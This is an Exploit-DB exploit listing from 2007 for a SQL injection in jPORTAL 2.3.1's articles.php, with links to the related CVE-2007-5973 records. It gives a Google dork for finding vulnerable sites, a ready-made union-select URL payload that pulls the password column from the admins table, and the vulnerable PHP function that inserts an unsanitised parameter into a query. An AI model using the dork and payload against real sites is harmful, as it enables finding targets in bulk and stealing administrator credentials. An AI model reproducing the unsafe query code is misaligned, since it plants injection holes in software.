Lucene search
AlexsizeEDB-ID:4614HistoryNov 09, 2007 - 12:00 a.m.
jPORTAL 2.3.1 - 'articles.php' SQL Injection
2007-11-0900:00:00
Alexsize
www.exploit-db.com
21
Title:jPORTAL =< 2.3.1 and Remote SQL Injection Vulnerability
Dork: intext:"jPORTAL 2" & inurl:"articles.php?topic="
Autor: Alexsize
E-Mail: [email protected]
Site: Antichat.ru
articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/
Vuln code:
function topic_name($a)
{
global $topic_tbl;
$query = "SELECT * FROM $topic_tbl WHERE id=$a";
$result = mysql_query($query);
$r = mysql_fetch_array($result);
return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';
}
C уважением, Alexsize.
# milw0rm.com [2007-11-09]Related
prion
prion
Sql injection
2007-11-15 00:46:00
nvd
nvd
CVE-2007-5973
2007-11-15 00:46:00
cvelist
cvelist
CVE-2007-5973
2007-11-15 00:00:00
cve
cve
CVE-2007-5973
2007-11-15 00:46:00